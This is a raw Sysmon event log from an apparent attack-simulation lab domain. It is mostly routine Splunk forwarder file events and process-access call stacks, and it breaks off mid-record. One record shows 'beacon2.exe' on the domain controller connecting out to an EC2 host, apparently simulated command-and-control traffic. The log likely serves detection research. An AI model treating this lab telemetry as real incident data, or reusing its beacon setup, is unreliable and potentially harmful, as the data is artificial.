12:23:10.451{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0CD5277B31493E4EA8B56D42E53CE657,SHA256=515AC6814BAAC4BD21268606425A1A4A37D571E236EF167E209C6AAC382FC6C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440222Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:10.332{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=599DC4D7B34DB249147E4F3DB286B3AC,SHA256=57B6B00B737C5AE5947D5AB5D0D0FC5FA010D9B2774BF4F8D74B72523515B4C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291423Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:10.380{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D58305EEC859F8CDE26BB902707A249A,SHA256=BD1C787512A0B68BE2706D93F884C8B6FC908E5671FDB0DC4F47B5CB77014C5B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440221Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:10.137{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440220Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:10.137{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291424Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:11.447{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52A984652B46EE1127B4DFC85B8F3DBB,SHA256=1BAD49870B877744B902DBCA4990D1A0F2D3F411C3BAF25C17E7F1CA66F36E59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440230Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:11.499{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FE95F990BB1A2AB260ED9C8FC751A96,SHA256=F220B4041AF6922A0BD0D5B68D103A253363CD62570E6E4079D51B1F32655782,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440229Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:11.138{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440228Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:11.138{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000440227Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:07.686{42DC5269-15AB-6087-FD0C-00000000BA01}5180C:\Users\Administrator\Desktop\beacon2.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-932.attackrange.local62395-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 10341000x8000000000000000440226Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:11.011{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1600-00000000BA01}1240C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440225Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:11.011{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1600-00000000BA01}1240C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440224Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:11.011{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1600-00000000BA01}1240C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291427Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:12.483{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86366A791172BA0BD15C1056AE83C227,SHA256=095C52258AEF3C2916CD699E5A5D1CC06364C016E6EA245DDF665B4C67A9F4D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440234Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:12.508{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=897BF2969A67764276C946865E34DCC4,SHA256=8606FB811994D2B8B7DEB0989CD449EEF25DBCDCD7DA101007735B4AD7262B76,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291426Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:10.396{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50612-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291425Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:12.233{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C2CCB1E103B37E43C181F388772E052B,SHA256=E4C9606C578169B9752D9F0F25D4FD0195B7824F21E8843AC9CA77B0DAEE05C2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440233Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:12.139{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440232Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:12.139{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000440231Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:08.555{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62396-false10.0.1.12-8000- 23542300x8000000000000000291428Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:13.520{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF4E52387D878930661E12E7678EDA40,SHA256=434983A2B45DBEB60CAA65CF5646C2059092A70F3A8D39B90F93D7E0AC4BFCC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440237Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:13.512{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F49665997E30978C03828A7B5A56CB44,SHA256=DAE6D37CBA9DD4286AEB46CA64820CB751F92417AE0C0B0C59A29009DFB1588F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440236Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:13.140{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440235Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:13.140{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291430Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:14.869{BEA10069-D0C2-6086-1300-00000000BB01}344NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=9AB0BF2BEDECE101E999E3A3CB0F844A,SHA256=568B614892045B96105F942B5C01B44C67316A22622C2E02BB69C1E8CD01233C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291429Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:14.553{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B270FF98E731EEB506F16242BE87D50,SHA256=A9E3867AA76FE79C7AE96C57B04FDD9520788504EFF8814463451BE6096F6CD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440240Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:14.520{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7D54F963F7265BEC2E4A20C406CEAED,SHA256=8FC43C7264ED5E562935872CEDDFB30B4E0ED17397FAAF6797E3BD8818DD7AFA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440239Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:14.141{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440238Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:14.141{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440243Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:15.561{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=626D8C4492E0DA6CA0C32F43369DB571,SHA256=663AC521D81DDF6F7D1BB0F2EFC2D79B737717E108B325E0E85988D255AF32E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291431Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:15.555{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6ECF3B74293430C2592C7E3993A67719,SHA256=0432EA2E21264E0FCFAAD83CD754E0F3A43A58262ED1A1A2B7859FD40C013BCF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440242Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:15.142{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440241Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:15.142{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440248Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:16.612{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E7671F6A3513F93E5EFF5D8CB675CA5,SHA256=7C4150952FA595D1CE1E444FB7233BCE6F1193182425B4DF4493EC19C59497F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291432Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:16.573{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=640B79C94286999408401C2A4CD7FAF2,SHA256=20682B624741BDD5E0D83DB4CAFCCB67EF073D781BACD38D87291596A6685CF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440247Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:16.245{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=423FA69EC22105D0B61DA9276D09282D,SHA256=4042C49FB3714AA00BDC510B09E2E3B6911F0A693527182290195D549B230F46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440246Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:16.244{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8E69DDBBFD1CF1D55679435E92C69567,SHA256=825561BD5BDB266D426CCC9BD6C550FD0AEABD43E6BD04852F833ED66E3FCF95,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440245Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:16.143{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440244Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:16.143{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291433Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:17.629{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6AA3FD5F67B4AAADF0D844CB03C119B,SHA256=ADEF2D0B7F264A67579CCD428CA3390B4B3C2E26F61BE347D04BCA72E5FF0D60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440252Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:17.615{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=064B80476D647E9F6CBE4CCF0C0912B3,SHA256=EB8075429A64FB1ACC51212C76CDEDAFFB4261DCF9B37A10909C6453EAD2BB00,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000440251Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:13.685{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 